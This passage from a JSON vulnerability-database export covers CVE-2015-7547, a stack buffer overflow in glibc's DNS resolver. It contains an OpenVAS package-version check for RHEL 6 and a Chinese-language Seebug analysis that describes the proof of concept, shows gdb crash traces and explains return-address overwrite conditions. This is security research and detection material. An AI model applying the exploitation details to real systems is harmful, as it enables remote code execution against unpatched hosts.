"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7547"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2016-02-17T00:00:00", "id": "OPENVAS:1361412562310871557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871557", "type": "openvas", "title": "RedHat Update for glibc RHSA-2016:0175-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2016:0175-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871557\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-17 06:25:59 +0100 (Wed, 17 Feb 2016)\");\n script_cve_id(\"CVE-2015-7547\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for glibc RHSA-2016:0175-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C\nlibraries (libc), POSIX thread libraries (libpthread), standard math libraries\n(libm), and the Name Server Caching Daemon (nscd) used by multiple programs on\nthe system. Without these libraries, the Linux system cannot function correctly.\n\nA stack-based buffer overflow was found in the way the libresolv library\nperformed dual A/AAAA DNS queries. A remote attacker could create a\nspecially crafted DNS response which could cause libresolv to crash or,\npotentially, execute code with the permissions of the user running the\nlibrary. Note: this issue is only exposed when libresolv is called from the\nnss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nThis update also fixes the following bugs:\n\n * The dynamic loader has been enhanced to allow the loading of more shared\nlibraries that make use of static thread local storage. While static thread\nlocal storage is the fastest access mechanism it may also prevent the\nshared library from being loaded at all since the static storage space is a\nlimited and shared process-global resource. Applications which would\npreviously fail with 'dlopen: cannot load any more object with static TLS'\nshould now start up correctly. (BZ#1291270)\n\n * A bug in the POSIX realtime support would cause asynchronous I/O or\ncertain timer API calls to fail and return errors in the presence of large\nthread-local storage data that exceeded PTHREAD_STACK_MIN in size\n(generally 16 KiB). The bug in librt has been corrected and the impacted\nAPIs no longer return errors when large thread-local storage data is\npresent in the application. (BZ#1301625)\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:0175-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-February/msg00032.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.12~1.166.el6_7.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T12:16:24", "description": "### 1. \u6f0f\u6d1e\u6982\u8981\r\n\r\nGlibc\u662fGNU\u53d1\u5e03\u7684LIBC\u5e93\u7684C\u8fd0\u884c\u5e93\uff0cGlibc\u662fLinux\u7cfb\u7edf\u4e2d\u6700\u5e95\u5c42\u7684API\uff0c\u57fa\u672c\u5176\u5b83\u4efb\u4f55\u8fd0\u884c\u5e93\u90fd\u4f1a\u4f9d\u8d56\u4e8eGlibc\u3002Glibc\u9664\u4e86\u5c01\u88c5Linux\u64cd\u4f5c\u7cfb\u7edf\u6240\u63d0\u4f9b\u7684\u7cfb\u7edf\u670d\u52a1\u5916\uff0c\u8fd8\u63d0\u4f9b\u4e86\u5176\u5b83\u7684\u5fc5\u8981\u670d\u52a1\u7684\u5b9e\u73b0\u3002\u7531\u4e8e Glibc \u51e0\u4e4e\u5305\u542b\u6240\u6709\u7684 UNIX \u901a\u884c\u7684\u6807\u51c6\uff0c\u53ef\u4ee5\u8bf4\u662f\u64cd\u4f5c\u7cfb\u7edf\u91cd\u8981\u652f\u6491\u5e93\u3002\r\n\r\n![](https://images.seebug.org/1455772018488)\r\n\r\nGlibc\u4e2d\u7684 DNS \u89e3\u6790\u5668\u4e2d\u5b58\u5728\u57fa\u4e8e\u6808\u7684\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5f53\u5728\u7a0b\u5e8f\u4e2d\u8c03\u7528`Getaddrinfo`\u51fd\u6570\u65f6\uff0c\u653b\u51fb\u8005\u81ea\u5b9a\u4e49\u57df\u540d\u6216\u662f\u901a\u8fc7\u4e2d\u95f4\u4eba\u653b\u51fb\u5229\u7528\u8be5\u6f0f\u6d1e\u63a7\u5236\u7528\u6237\u7cfb\u7edf\u3002\u6bd4\u5982\u653b\u51fb\u8005\u5411\u7528\u6237\u53d1\u9001\u5e26\u6709\u6307\u5411\u6076\u610f\u57df\u540d\u7684\u94fe\u63a5\u7684\u90ae\u4ef6\uff0c\u4e00\u65e6\u7528\u6237\u70b9\u51fb\u8be5\u94fe\u63a5\uff0c\u653b\u51fb\u8005\u6784\u9020\u5408\u6cd5\u7684DNS\u8bf7\u6c42\u65f6\u3001\u4ee5\u8fc7\u5927\u7684DNS\u6570\u636e\u56de\u5e94\u4fbf\u4f1a\u5f62\u6210\u5806\u6808\u7f13\u5b58\u533a\u6ea2\u51fa\u5e76\u6267\u884c\u8fdc\u7a0b\u4ee3\u7801\uff0c\u8fbe\u5230\u5b8c\u5168\u63a7\u5236\u7528\u6237\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\n> \u8be5\u6f0f\u6d1e\u5f71\u54cdGlibc 2.9\u4ee5\u540e\u7684\u6240\u6709\u7248\u672c\uff0c\u867d\u7136\u53ef\u4ee5\u8fdb\u884c\u8fdc\u7a0b\u6267\u884c\u653b\u51fb,\u653b\u51fb\u8005\u8fd8\u9700\u8981\u89e3\u51b3\u7ed5\u8fc7ASLR\u7cfb\u7edf\u5b89\u5168\u673a\u5236\u3002\r\n\r\n### 2. \u6f0f\u6d1e\u590d\u73b0\r\n\r\nGoogle\u63d0\u4f9b\u7684POC\u7531\u4e24\u90e8\u5206\u7ec4\u6210:\r\n\r\n* \u6267\u884c`CVE-2015-7547-POC.py`\u4f5c\u4e3a\u4e00\u4e2a\u4f2a\u9020\u7684DNS\u670d\u52a1\u5668\uff0c\u4f1a\u5411DNS\u5ba2\u6237\u7aef\u53d1\u9001\u6784\u9020\u7684\u9a8c\u8bc1\u6570\u636e\uff0c\u5305\u542b\u8d85\u957f\u5b57\u7b26\u4e32\u3002\r\n\r\n ![](https://images.seebug.org/1455772482186)\r\n\r\n* \u6267\u884c\u7f16\u8bd1\u597d\u7684`CVE-2015-7547-CLIENT.c`\u4f5c\u4e3a\u5ba2\u6237\u7aef\uff0c\u5411\u6b64DNS\u670d\u52a1\u5668\u8fdb\u884c\u67e5\u8be2\uff0c\u4f1a\u5728\u6536\u5230\u6570\u636e\u540e\u5bfc\u81f4\u7a0b\u5e8f\u5d29\u6e83\u3002\u5b9e\u6d4b\u5176\u5b83\u8c03\u7528Glibc\u7684\u7a0b\u5e8f\u4e5f\u4f1a\u56e0\u67e5\u8be2\u57df\u540d\u5bfc\u81f4\u5d29\u6e83\u3002\r\n\r\n ![](https://images.seebug.org/1455772043379)\r\n\r\n\u5b9e\u6d4b\u5176\u5b83\u8c03\u7528Glibc\u7684\u7a0b\u5e8f\u4e5f\u4f1a\u56e0\u67e5\u8be2\u57df\u540d\u5bfc\u81f4\u5d29\u6e83\u3002\u4f2a\u9020DNS\u670d\u52a1\u5668\u53d1\u51fa\u7684POC\u6570\u636e\uff0c\u5728TCP DNS\u6570\u636e\u4e2d\u5305\u542b\u4e86\u5927\u91cf\u5b57\u7b26\u201cB\u201d,\u5982\u4e0b :\r\n\r\n![](https://images.seebug.org/1455772051460)\r\n\r\n\u4f7f\u7528IDA\u8fdc\u7a0b\u8c03\u8bd5 Debian \u7cfb\u7edf\u4e0a\u7684CVE-2015-7547-CLIENT\uff0c\u5728\u8c03\u7528Glibc\u7684 `Getaddrinfo` \u51fd\u6570\u65f6\u51fa\u73b0\u5d29\u6e83\uff0c\u5d29\u6e83\u73b0\u573a\u7684\u72b6\u6001\u5982\u4e0b:\r\n\r\n![](https://images.seebug.org/1455772057868)\r\n\r\n\u7531\u4e8e\u4ea7\u751f\u6ea2\u51fa\u8986\u76d6\uff0c`EDX`\u5bc4\u5b58\u5668\u7684\u503c\u88ab\u63a7\u5236\u4e3a`0x42424242`\uff0c\u5904\u5728\u672a\u4f7f\u7528\u7684\u5730\u5740\u6bb5\uff0c\u5bfc\u81f4\u5728\u5bf9`[EDX+3]`\u8fdb\u884c\u5bfb\u5740\u8bbf\u95ee\u65f6\u9020\u6210\u5f02\u5e38\u3002\u6b64\u65f6\u51fd\u6570\u8c03\u7528\u6808\u5982\u4e0b:\r\n\r\n![](https://images.seebug.org/1455772604690)\r\n\r\n\u6808\u7a7a\u95f4\u4e2d\u88ab\u8986\u76d6\u7684\u6570\u636e\u5982\u4e0b:\r\n\r\n![](https://images.seebug.org/1455772065483)\r\n\r\n### 3.\u6f0f\u6d1e\u539f\u56e0\u548c\u5229\u7528\r\nGlibc\u4e2d\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u7684\u51fd\u6570\u8c03\u7528\u987a\u5e8f\u5982\u4e0b\uff1a\r\n```\r\ngetaddrinfo (getaddrinfo.c) ->\r\n\r\n_nss_dns_gethostbyname4_r (dns-host.c) ->\r\n\r\n__libc_res_nsearch (res_query.c) ->\r\n\r\n__libc_res_nquery (res_query.c) ->\r\n\r\n__libc_res_nsend (res_send.c) ->\r\n\r\nsend_vc (res_send.c)\r\n```\r\n\u5b58\u5728\u6ea2\u51fa\u6f0f\u6d1e\u7684\u7f13\u51b2\u533a\u662f\u5728_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\u7533\u8bf7\u7684\u3002\r\n![](http://blog.knownsec.com/wp-content/uploads/2016/02/81.png)\r\n\r\n![](http://blog.knownsec.com/wp-content/uploads/2016/02/9.png)\r\n\r\n\u53ef\u4ee5\u770b\u5230\u5728_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\uff0c\u4f7f\u7528alloca\u51fd\u6570\u7533\u8bf7\u4e862048\u5b57\u8282\u7684\u5185\u5b58\u7a7a\u95f4\u3002alloca\u51fd\u6570\u7684\u529f\u80fd\u662f\u52a8\u6001\u5f00\u8f9f\u6808\u5730\u5740\u7a7a\u95f4\uff0c\u4f46\u5982\u679c\u53c2\u6570\u662f\u4e2a\u56fa\u5b9a\u5927\u5c0f\u7684\u503c\uff0c\u6c47\u7f16\u4ee3\u7801\u5c31\u751f\u6210\u4e3a\u628aESP\u51cf\u53bb\u56fa\u5b9a\u503c\u3002\u8c03\u8bd5\u5206\u6790\u6808\u7684\u5e03\u5c40\u53ef\u4ee5\u53d1\u73b0\uff0chost_buffer\u7b49\u5c40\u90e8\u53d8\u91cf\u662f\u5904\u5728\u6808\u7684\u9ad8\u5730\u5740\uff0calloca\u5206\u914d\u7684\u5185\u5b58\u662f\u5904\u5728\u6808\u7684\u4f4e\u5730\u5740\uff0c\u8fd92048\u5b57\u8282\u88ab\u6ea2\u51fa\u4e4b\u540e\u4f1a\u8986\u76d6\u6389host_buffer\u7b49\u53d8\u91cf\u3002\r\n![](http://blog.knownsec.com/wp-content/uploads/2016/02/10.png)\r\n\u4ece\u4ee5\u4e0a\u4e24\u56fe\u53ef\u4ee5\u770b\u51fa\uff0c\u8fdb\u5165_nss_dns_gethostbyname4_r\u51fd\u6570\u65f6\uff0c\u8fd4\u56de\u5730\u5740\u6240\u5728\u6808\u4e2d\u7684\u4f4d\u7f6e\u662f0xBFFFF560\u3002\u800c\u5f53\u5b8c\u6210\u6ea2\u51fa\u8986\u76d6\u5bfc\u81f4\u8bbf\u95ee\u5f02\u5e38\u65f6\uff0c\u6b64\u8fd4\u56de\u5730\u5740\u5904\u7684\u503c\u5df2\u7ecf\u88ab\u6539\u5199\u4e3a0x42424242\u3002\r\n\r\n_nss_dns_gethostbyname4_r\u51fd\u6570\u4e2d\u8c03\u7528\u4e86__libc_res_nsearch\u51fd\u6570\u8fdb\u884c\u5b9e\u9645\u57df\u540d\u67e5\u8be2\uff0c\u628a\u5c40\u90e8\u53d8\u91cfhost_buffer\u7684\u6808\u5730\u5740\u4f5c\u4e3a\u53c2\u6570\u4f20\u9012\u8fdb\u53bb\uff0c\u7528\u4e8e\u4fdd\u5b58DNS\u670d\u52a1\u5668\u6570\u636e\u7684\u5b9e\u9645\u5b58\u50a8\u5730\u5740\u3002\u6700\u7ec8\u4f1a\u8c03\u7528\u5230send_vc\u51fd\u6570\uff0c\u5728\u63a5\u6536\u5927\u4e8e2048\u5b57\u8282\u7684\u6570\u636e\u4e4b\u524d\uff0c\u672c\u5e94\u8be5\u5728\u5224\u65ad\u7f13\u51b2\u533a\u5927\u5c0f\u4e0d\u591f\u65f6\u53bb\u5206\u914d\u66f4\u5927\u7684\u5806\u5185\u5b58\uff0c\u4f46\u7531\u4e8e\u5b58\u5728\u4e00\u6bb5\u4e0d\u592a\u6210\u719f\u7684\u6d4b\u8bd5\u4ee3\u7801\u7ed3\u679c\u9020\u6210\u4e86\u903b\u8f91\u9519\u8bef\uff0c\u4f7f\u5f97\u5224\u65ad\u7f13\u51b2\u533a\u8fc7\u5c0f\u7684\u6761\u4ef6\u6c38\u8fdc\u4e0d\u6210\u7acb\uff0c\u8fd9\u6837\u5c31\u4e0d\u4f1a\u53bb\u5206\u914d\u5927\u5185\u5b58\uff0c\u5bfc\u81f4\u6570\u636e\u4fdd\u5b58\u5230alloca\u5206\u914d\u7684\u6808\u5185\u5b58\u4e2d\uff0c\u9020\u6210\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\u5728\u6700\u65b0\u53d1\u5e03\u7684glibc 2.23\u7248\u8865\u4e01\u4e2d\uff0c\u8fd9\u6bb5\u4e0d\u6210\u719f\u7684\u4ee3\u7801\u5df2\u88ab\u5220\u6389\uff0c\u89e3\u51b3\u4e86\u6b64\u6f0f\u6d1e\u3002\r\n\r\nPOC\u5bfc\u81f4\u7a0b\u5e8f\u5d29\u6e83\u7684\u539f\u56e0\uff0c\u662f\u7531\u4e8e\u51fa\u73b0\u7f13\u51b2\u533a\u6ea2\u51fa\u540e\uff0c\u5728__libc_res_nquery\u51fd\u6570\u4e2d\u4f1a\u8bbf\u95eehost_buffer\u6307\u9488\u6240\u6307\u5411\u7684\u5730\u5740\uff0c\u4f46\u6b64\u503c\u5df2\u7ecf\u88ab\u8986\u76d6\u4e3a0x42424242\uff0c\u662f\u4e0d\u53ef\u8bbf\u95ee\u7684\u5730\u5740\uff0c\u9700\u8981\u628a\u8fd9\u4e2a\u503c\u8986\u76d6\u4e3a\u4e00\u4e2a\u53ef\u8bbf\u95ee\u5730\u5740\u3002\r\n\r\n\u4e3a\u4e86\u5b9e\u73b0\u6f0f\u6d1e\u5229\u7528\uff0c\u8981\u8986\u76d6_nss_dns_gethostbyname4_r\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u3002\u4f46\u662f\u5728\u6b64\u51fd\u6570\u8fd4\u56de\u4e4b\u524d\uff0c\u8fd8\u8981\u8fdb\u884c\u4e00\u6b21free\u7684\u64cd\u4f5c\u3002\u4f1a\u5224\u65adhost_buffer\u6307\u9488\u662f\u5426\u8fd8\u662falloca\u5206\u914d\u7684\u6808\u5730\u5740\uff0c\u5982\u679c\u88ab\u6539\u53d8\u4e86\uff0c\u5c31\u8bf4\u660e\u53c8\u91cd\u65b0\u5206\u914d\u4e86\u5806\u5185\u5b58\uff0c\u9700\u8981\u8fdb\u884c\u5185\u5b58\u91ca\u653e\u3002\u4f46\u5982\u679c\u6b64\u53d8\u91cf\u88ab\u6ea2\u51fa\u8986\u76d6\u6210\u5176\u5b83\u503c\u4e86\uff0c\u5c31\u4f1a\u5bfc\u81f4\u91ca\u653e\u8fd9\u4e2a\u975e\u5806\u5185\u5b58\u5730\u5740\u65f6\uff0c\u51fa\u73b0\u7a0b\u5e8f\u5f02\u5e38\uff0c\u4e0d\u80fd\u7ee7\u7eed\u52a0\u8f7d\u8fd4\u56de\u5730\u5740\u3002\u6240\u4ee5\u89e3\u51b3\u7684\u529e\u6cd5\u662f\uff0c\u5728\u6ea2\u51fa\u8986\u76d6\u540e\u8981\u4e48\u4e0d\u6539\u53d8\u8fd9\u4e2a\u6307\u9488\u7684\u6808\u5730\u5740\u503c\uff0c\u8981\u4e48\u4fee\u6539\u4e3a\u4e00\u4e2a\u6709\u6548\u7684\u5806\u5757\u8d77\u59cb\u5730\u5740\u3002Glibc\u6a21\u5757\u5728\u51fd\u6570\u4ee3\u7801\u4e2d\u6ca1\u6709\u8fdb\u884c\u6808\u6ea2\u51fa\u68c0\u67e5\uff0c\u4e4b\u540e\u5373\u53ef\u5728\u51fd\u6570\u8fd4\u56de\u65f6\u63a7\u5236\u7a0b\u5e8f\u6d41\u7a0b\u3002\r\n\r\n\u4f46\u662f\u5728\u5f00\u542f\u5730\u5740\u968f\u673a\u5316\u7684\u60c5\u51b5\u4e0b\uff0c\u5982\u679c\u6ca1\u6709\u529e\u6cd5\u6cc4\u9732\u5185\u5b58\u5730\u5740\u5e03\u5c40\uff0c\u5355\u72ec\u9760\u8fd9\u4e00\u6f0f\u6d1e\u662f\u65e0\u6cd5\u6210\u529f\u5229\u7528\u7684\u3002\r\n### 4. \u6f0f\u6d1e\u5206\u6790\uff08\u8be5\u90e8\u5206\u5185\u5bb9\u6765\u81ea\u7528\u6237k0sh1\uff09\r\n\u5728\u56de\u6eaf\u8fc7\u7a0b\u4e2d\uff0c\u6211\u4eec\u9700\u8981\u7740\u91cd\u89c2\u5bdf\u7684\u662f\uff0c\u7a76\u7adf\u662f\u4f55\u65f6\u6808\u4e2d\u88ab\u7578\u5f62\u5b57\u7b26\u4e32\u8986\u76d6\uff0c\u53c8\u662f\u5728\u4f55\u5904\uff0c\u5bfc\u81f4\u7578\u5f62\u5b57\u7b26\u4e32\u7684\u8bfb\u53d6\u3002\r\n\r\n\u9996\u5148\u6211\u4eec\u5c31\u4ece\u79bb\u5d29\u6e83\u73b0\u573a\u5df2\u77e5\u6700\u8fdc\u7aef\u5165\u624b\uff0c\u8fdb\u884c\u5206\u6790\u3002\u6839\u636ebt\u56de\u6eaf\u7684\u4fe1\u606f\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230nss_dns_gethostbyname4_r\u662fnss_dns/dns-host.c\u4e2d\u7684\u51fd\u6570\uff0c\u8fd9\u4e2a.c\u6587\u4ef6\u5bf9\u5e94\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u662flibnss_dns.so.2\uff0c\u90a3\u4e48\u6211\u4eec\u9700\u8981\u5728\u52a0\u8f7d\u52a8\u6001\u94fe\u63a5\u5e93\u540e\u5bf9\u8fd9\u4e2a\u51fd\u6570\u4e0b\u65ad\u70b9\uff0c\u6211\u4eec\u4f7f\u7528gdb\u4e2d\u7684catch load libnss_dns.so.2\u5bf9\u52a8\u6001\u94fe\u63a5\u5e93\u52a0\u8f7d\u8fdb\u884c\u8ddf\u8e2a\u3002\r\n\r\n```\r\ngdb-peda$ catch load libnss_dns.so.2\r\nCatchpoint 1 (load)\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbfffe98c --> 0xbfffeb50 (\"libnss_dns.so.2\")\r\nEBX: 0xb7fff000 --> 0x22f0c \r\nECX: 0x4 \r\nEDX: 0x9 ('\\t')\r\nESI: 0x0 \r\nEDI: 0x4 \r\nEBP: 0xbfffe868 --> 0xbfffe9c8 --> 0xbfffeb88 --> 0xbfffebb8 --> 0xbffff0e8 --> 0xbffff218 --> 0xbffff268 --> 0x0 \r\nESP: 0xbfffe800 --> 0x804bff0 --> 0xb7e04000 --> 0x464c457f \r\nEIP: 0xb7fef15a (<dl_open_worker+970>:\tnop)\r\nEFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7fef153 <dl_open_worker+963>:\ttest eax,eax\r\n 0xb7fef155 <dl_open_worker+965>:\tje 0xb7fef15b <dl_open_worker+971>\r\n 0xb7fef157 <dl_open_worker+967>:\tmov eax,DWORD PTR [ebp+0x8]\r\n=> 0xb7fef15a <dl_open_worker+970>:\tnop\r\n 0xb7fef15b <dl_open_worker+971>:\tmov eax,DWORD PTR [ebp+0x8]\r\n 0xb7fef15e <dl_open_worker+974>:\tsub esp,0xc\r\n 0xb7fef161 <dl_open_worker+977>:\tmov ecx,DWORD PTR [eax+0x1c]\r\n 0xb7fef164 <dl_open_worker+980>:\tmov edx,DWORD PTR [eax+0x18]\r\n[------------------------------------stack-------------------------------------]\r\n\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nCatchpoint 1\r\n Inferior loaded /lib/i386-linux-gnu/libnss_dns.so.2\r\n /lib/i386-linux-gnu/libresolv.so.2\r\n0xb7fef15a in dl_open_worker (a=0xbfffe98c) at dl-open.c:572\r\n572\tdl-open.c: No such file or directory.\r\n```\r\n\r\n\u7a0b\u5e8f\u4e2d\u65ad\u540e\uff0c\u8bf4\u660e\u52a8\u6001\u94fe\u63a5\u5e93\u5df2\u7ecf\u88ab\u52a0\u8f7d\uff0c\u8fd9\u65f6\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u7ed9_nss_dns_gethostbyname4_r\u4e0b\u65ad\u70b9\u4e86\u3002\r\n\r\n```\r\ngdb-peda$ delete\r\ngdb-peda$ b _nss_dns_gethostbyname4_r\r\nBreakpoint 2 at 0xb7e064d0: file nss_dns/dns-host.c, line 284.\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbffff0c4 --> 0x0 \r\nEBX: 0xb7fd3000 --> 0x19cd64 \r\nECX: 0xbfffeb27 --> 0x0 \r\nEDX: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nESI: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nEDI: 0x420 \r\nEBP: 0xbffff0e8 --> 0xbffff218 --> 0xbffff268 --> 0x0 \r\nESP: 0xbfffebac --> 0xb7efddbc (<gaih_inet+3495>:\tadd esp,0x20)\r\nEIP: 0xb7e064d0 (<_nss_dns_gethostbyname4_r>:\tpush ebp)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7e064c8 <_nss_dns_gethostbyname_r+136>:\tpop ebx\r\n 0xb7e064c9 <_nss_dns_gethostbyname_r+137>:\tret \r\n 0xb7e064ca:\tlea esi,[esi+0x0]\r\n=> 0xb7e064d0 <_nss_dns_gethostbyname4_r>:\tpush ebp\r\n 0xb7e064d1 <_nss_dns_gethostbyname4_r+1>:\tmov ebp,esp\r\n 0xb7e064d3 <_nss_dns_gethostbyname4_r+3>:\tpush edi\r\n 0xb7e064d4 <_nss_dns_gethostbyname4_r+4>:\tpush esi\r\n 0xb7e064d5 <_nss_dns_gethostbyname4_r+5>:\tpush ebx\r\n[------------------------------------stack-------------------------------------]\r\n\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, _nss_dns_gethostbyname4_r (name=0x8048653 \"foo.bar.google.com\", \r\n pat=0xbffff0c8, buffer=0xbfffebd0 \"\\377\\002\", buflen=0x420, \r\n errnop=0xbffff0c4, herrnop=0xbffff0b0, ttlp=0x0) at nss_dns/dns-host.c:284\r\n284\tnss_dns/dns-host.c: No such file or directory.\r\n```\r\n\r\n\u987a\u5229\u5728\u5165\u53e3\u5904\u65ad\u4e86\u4e0b\u6765\uff0c\u8fd9\u65f6\u6211\u4eec\u7ee7\u7eed\u6309c\uff0c\u8fdb\u884ccontinue\u64cd\u4f5c\u53d1\u73b0\u76f4\u63a5\u5230\u8fbe\u6f0f\u6d1e\u73b0\u573a\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u5c31\u4e0d\u5c55\u793a\u4e86\uff0c\u53ef\u4ee5\u5728\u8ddf\u8e2a\u8c03\u8bd5\u65f6\u8fdb\u884c\uff0c\u8fd9\u8bf4\u660e\u8fdb\u5165\u6b64\u51fd\u6570\u662f\u6f0f\u6d1e\u89e6\u53d1\u524d\u552f\u4e00\u4e00\u6b21\u8c03\u7528\u5230_nss_dns_gethostbyname4_r\u51fd\u6570\u7684\u4f4d\u7f6e\uff0c\u6211\u4eec\u901a\u8fc7bt\u6765\u89c2\u5bdf\u4e00\u4e0b\u3002\r\n\r\n```\r\ngdb-peda$ bt\r\n#0 _nss_dns_gethostbyname4_r (name=0x8048653 \"foo.bar.google.com\", \r\n pat=0xbffff0c8, buffer=0xbfffebd0 \"\\377\\002\", buflen=0x420, \r\n errnop=0xbffff0c4, herrnop=0xbffff0b0, ttlp=0x0) at nss_dns/dns-host.c:284\r\n#1 0xb7efddbc in gaih_inet (name=<optimized out>, \r\n name@entry=0x8048653 \"foo.bar.google.com\", service=<optimized out>, \r\n req=0xbffff23c, pai=0xbffff1fc, naddrs=0xbffff1c4)\r\n at ../sysdeps/posix/getaddrinfo.c:862\r\n#2 0xb7f0023e in __GI_getaddrinfo (name=<optimized out>, \r\n service=0x8048650 \"22\", hints=0xbffff23c, pai=0xbffff234)\r\n at ../sysdeps/posix/getaddrinfo.c:2417\r\n#3 0x08048588 in main ()\r\n#4 0xb7e4d5cb in __libc_start_main (main=0x804853b <main>, argc=0x1, \r\n argv=0xbffff314, init=0x80485d0 <__libc_csu_init>, \r\n fini=0x8048630 <__libc_csu_fini>, rtld_fini=0xb7feb210 <_dl_fini>, \r\n stack_end=0xbffff30c) at libc-start.c:289\r\n#5 0x08048461 in _start 